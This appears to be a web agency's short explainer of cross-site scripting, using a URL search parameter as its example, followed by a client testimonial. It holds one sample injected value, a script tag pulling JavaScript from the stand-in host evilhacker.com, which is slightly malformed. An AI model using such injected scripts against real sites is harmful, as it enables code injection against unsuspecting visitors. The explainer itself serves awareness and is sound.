Cross-Site Scripting (XSS)

Wikipedia defines Cross-Site Scripting as:

“...a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users.”

Let us explain that - many dynamic websites rely on variables that are sent in the URL. Have you ever looked at the address bar in the top of your browser and seen a bunch of jibberish that looks like:

“page.php?session=fdajkl5ejklad&search=bananas”

Those things after the “?” are variables and their values. So, in this case we have two variables - one named “session” and one named “search”. The value of these variables is often used in the back-end code for the website. For example, the page may now say something like “Your search for 'bananas' returned 12 documents.”

So how is that dangerous, you ask? Well, someone with too much time on their hands can look at this URL and determine that they can put in something like:

“&search=<script href='http://www.evilhacker.com/inject.js></script>”

If the programmer has not properly filtered and escaped the search variable, the browser will now execute the javascript code that is hosted on evilhacker.com. Clearly, this was not the intent of the programmer, and can lead to some serious consequences.

The Good Word

“We have worked with Joel Post, Joe Koenig and their team at Creative Anvil since its inception and have found them to be extremely perceptive in helping us dig for our unique messaging style. They have pulled ideas from us and transformed them into an image that was just what we had in mind all along. Creative Anvil has assisted us...” Read More »

Donna Zerega
Advertising and Marketing
Prudential Alliance Realtors
St Louis, Mo

Anvil News